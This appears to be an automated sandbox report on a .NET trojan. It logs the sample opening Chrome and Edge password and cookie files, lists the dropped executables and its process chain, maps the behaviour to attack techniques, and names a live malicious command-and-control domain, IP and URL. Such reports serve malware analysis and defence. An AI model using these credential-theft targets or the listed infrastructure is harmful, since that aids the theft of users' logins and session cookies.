                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Microsoft\Edge\User Data\Default\Login DataJump to behavior

                          Remote Access Functionality

                          Source: Yara match; File source: 0000000C.00000002.3259059706.00000000055E7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match; File source: 0000000C.00000002.3259059706.0000000005781000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match; File source: 0000000C.00000002.3259059706.0000000005929000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match; File source: 00000006.00000002.2308672698.0000000013281000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match; File source: 0000000C.00000002.3259059706.0000000002B1B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match; File source: Process Memory Space: hyperbrokerhostNetsvc.exe PID: 5492, type: MEMORYSTR
                          Source: Yara match; File source: Process Memory Space: vVSUwBXtljAfFANPiZBBPFzlgh.exe PID: 4980, type: MEMORYSTR
                          Source: Yara match; File source: 6.0.hyperbrokerhostNetsvc.exe.c40000.0.unpack, type: UNPACKEDPE
                          Source: Yara match; File source: 00000000.00000003.2002850710.0000000006AB7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match; File source: 00000006.00000000.2263404724.0000000000C42000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                          Source: Yara match; File source: C:\PortCommon\vVSUwBXtljAfFANPiZBBPFzlgh.exe, type: DROPPED
                          Source: Yara match; File source: C:\Program Files\Microsoft Office 15\ClientX64\wininit.exe, type: DROPPED
                          Source: Yara match; File source: C:\PortCommon\vVSUwBXtljAfFANPiZBBPFzlgh.exe, type: DROPPED
                          Source: Yara match; File source: C:\PortCommon\hyperbrokerhostNetsvc.exe, type: DROPPED
                          Source: Yara match; File source: C:\PortCommon\sihost.exe, type: DROPPED
| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Gather Victim Identity Information | 11 Scripting | Valid Accounts | 141 Windows Management Instrumentation | 11 Scripting | 1 DLL Side-Loading | 1 Disable or Modify Tools | 1 OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
| Credentials | Domains | Default Accounts | 2 Command and Scripting Interpreter | 1 DLL Side-Loading | 12 Process Injection | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 3 File and Directory Discovery | Remote Desktop Protocol | 1 Data from Local System | 2 Non-Application Layer Protocol | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 3 Obfuscated Files or Information | Security Account Manager | 157 System Information Discovery | SMB/Windows Admin Shares | 1 Clipboard Data | 12 Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 11 Software Packing | NTDS | 361 Security Software Discovery | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 2 Process Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 113 Masquerading | Cached Domain Credentials | 261 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
| DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 261 Virtualization/Sandbox Evasion | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
| Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 12 Process Injection | Proc Filesystem | 1 Remote System Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
| Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | HTML Smuggling | /etc/passwd and /etc/shadow | 1 System Network Configuration Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |
[Behavior graph. ID: 1403707, Sample: hT7clR9Gz2.exe, Startdate: 05/03/2024, Architecture: WINDOWS, Score: 100]
Process chain: hT7clR9Gz2.exe -> wscript.exe -> cmd.exe -> hyperbrokerhostNetsvc.exe -> cmd.exe -> vVSUwBXtljAfFANPiZBBPFzlgh.exe
Network: vVSUwBXtljAfFANPiZBBPFzlgh.exe -> h172956.srv11.test-hf.su (91.227.16.11, EXIMIUS-ASRU, Russian Federation)

                          SourceDetectionScannerLabelLink
                          hT7clR9Gz2.exe55%ReversingLabsByteCode-MSIL.Trojan.Uztuby
                          hT7clR9Gz2.exe100%Joe Sandbox ML
Source | Detection | Scanner | Label
C:\Users\user\Desktop\MjOKfqVp.log | 100% | Avira | HEUR/AGEN.1362695
C:\Users\user\Desktop\DjncgsWF.log | 100% | Avira | HEUR/AGEN.1300079
C:\PortCommon\vVSUwBXtljAfFANPiZBBPFzlgh.exe | 100% | Avira | HEUR/AGEN.1339906
C:\PortCommon\QBVo6vYwcvtPMCVlfk17MWy9WfGX2h.vbe | 100% | Avira | VBS/Runner.VPG
C:\Users\user\Desktop\NcaIHEGQ.log | 100% | Avira | HEUR/AGEN.1300079
C:\Users\user\Desktop\CNmCQxgq.log | 100% | Avira | HEUR/AGEN.1300079
C:\Users\user\Desktop\RFZqtRqa.log | 100% | Avira | HEUR/AGEN.1300079
C:\PortCommon\vVSUwBXtljAfFANPiZBBPFzlgh.exe | 100% | Avira | HEUR/AGEN.1339906
C:\Program Files\Microsoft Office 15\ClientX64\wininit.exe | 100% | Avira | HEUR/AGEN.1339906
C:\PortCommon\hyperbrokerhostNetsvc.exe | 100% | Avira | HEUR/AGEN.1339906
C:\PortCommon\sihost.exe | 100% | Avira | HEUR/AGEN.1339906
C:\Users\user\Desktop\YQFyrQBy.log | 100% | Avira | HEUR/AGEN.1300079
C:\Users\user\Desktop\hgVgFZAw.log | 100% | Avira | HEUR/AGEN.1300079
C:\PortCommon\vVSUwBXtljAfFANPiZBBPFzlgh.exe | 100% | Joe Sandbox ML |
C:\Users\user\Desktop\EgPkCslz.log | 100% | Joe Sandbox ML |
C:\Users\user\Desktop\RFZqtRqa.log | 100% | Joe Sandbox ML |
C:\PortCommon\vVSUwBXtljAfFANPiZBBPFzlgh.exe | 100% | Joe Sandbox ML |
C:\Program Files\Microsoft Office 15\ClientX64\wininit.exe | 100% | Joe Sandbox ML |
C:\PortCommon\hyperbrokerhostNetsvc.exe | 100% | Joe Sandbox ML |
C:\PortCommon\sihost.exe | 100% | Joe Sandbox ML |
C:\Users\user\Desktop\aSrhMzGt.log | 100% | Joe Sandbox ML |
C:\PortCommon\hyperbrokerhostNetsvc.exe | 88% | ReversingLabs | ByteCode-MSIL.Trojan.Generic
C:\PortCommon\sihost.exe | 88% | ReversingLabs | ByteCode-MSIL.Trojan.Generic
C:\PortCommon\vVSUwBXtljAfFANPiZBBPFzlgh.exe | 88% | ReversingLabs | ByteCode-MSIL.Trojan.Generic
C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe | 88% | ReversingLabs | ByteCode-MSIL.Trojan.Generic
C:\Program Files\Microsoft Office 15\ClientX64\wininit.exe | 88% | ReversingLabs | ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\AyILZeLM.log | 8% | ReversingLabs |
C:\Users\user\Desktop\BvjTveaH.log | 12% | ReversingLabs |
C:\Users\user\Desktop\CNmCQxgq.log | 17% | ReversingLabs |
C:\Users\user\Desktop\DKOKmxvl.log | 12% | ReversingLabs |
C:\Users\user\Desktop\DjncgsWF.log | 62% | ReversingLabs | ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\EgPkCslz.log | 5% | ReversingLabs |
C:\Users\user\Desktop\EySSXLrj.log | 9% | ReversingLabs |
C:\Users\user\Desktop\HAEBtuve.log | 13% | ReversingLabs |
C:\Users\user\Desktop\MjOKfqVp.log | 12% | ReversingLabs |
C:\Users\user\Desktop\NcaIHEGQ.log | 17% | ReversingLabs |
C:\Users\user\Desktop\PZEBmnVi.log | 17% | ReversingLabs |
C:\Users\user\Desktop\RFZqtRqa.log | 4% | ReversingLabs |
C:\Users\user\Desktop\VWqPFTQA.log | 12% | ReversingLabs |
C:\Users\user\Desktop\VeZikCqF.log | 8% | ReversingLabs |
C:\Users\user\Desktop\WSdqVQmD.log | 10% | ReversingLabs |
C:\Users\user\Desktop\YQFyrQBy.log | 62% | ReversingLabs | ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\ZzoyrgAK.log | 12% | ReversingLabs |
C:\Users\user\Desktop\aSrhMzGt.log | 5% | ReversingLabs |
C:\Users\user\Desktop\dqepydAD.log | 13% | ReversingLabs |
C:\Users\user\Desktop\fFJfpvVh.log | 12% | ReversingLabs |
C:\Users\user\Desktop\hgVgFZAw.log | 17% | ReversingLabs |
C:\Users\user\Desktop\kWLWNWBq.log | 9% | ReversingLabs |
C:\Users\user\Desktop\mmqNDpWU.log | 4% | ReversingLabs |
C:\Users\user\Desktop\qtoWZHQP.log | 12% | ReversingLabs |
C:\Users\user\Desktop\rMQELCVZ.log | 12% | ReversingLabs |
C:\Users\user\Desktop\rZIMgllI.log | 17% | ReversingLabs |
C:\Users\user\Desktop\sDsEbPBc.log | 10% | ReversingLabs |
C:\Users\user\Desktop\tAUMwPQX.log | 17% | ReversingLabs |
                          No Antivirus matches
                          No Antivirus matches
Source | Detection | Scanner | Label
http://h172956.srv11.test-hf.su8 | 0% | Avira URL Cloud | safe
http://h172956.srv11.test-hf.su/ | 100% | Avira URL Cloud | malware
http://h172956.srv11.test-hf.su/providerVmjs_PollAuthapiBasecdndownloads.php(gI | 100% | Avira URL Cloud | malware
http://h172956.srv11.test-hf.su | 100% | Avira URL Cloud | malware
http://h172956.srv11.test-hf.su/providerVmjs_PollAuthapiBasecdndownloads.php | 100% | Avira URL Cloud | malware
Name | IP | Active | Malicious | Antivirus Detection | Reputation
h172956.srv11.test-hf.su | 91.227.16.11 | true | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://h172956.srv11.test-hf.su/providerVmjs_PollAuthapiBasecdndownloads.php | true | Avira URL Cloud: malware | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
91.227.16.11 | h172956.srv11.test-hf.su | Russian Federation | 207027 | EXIMIUS-ASRU | true
                                                Joe Sandbox version:40.0.0 Tourmaline
                                                Analysis ID:1403707
                                                Start date and time:2024-03-05 22:26:06 +01:00
                                                Joe Sandbox product:CloudBasic
                                                Overall analysis duration:0h 9m 30s
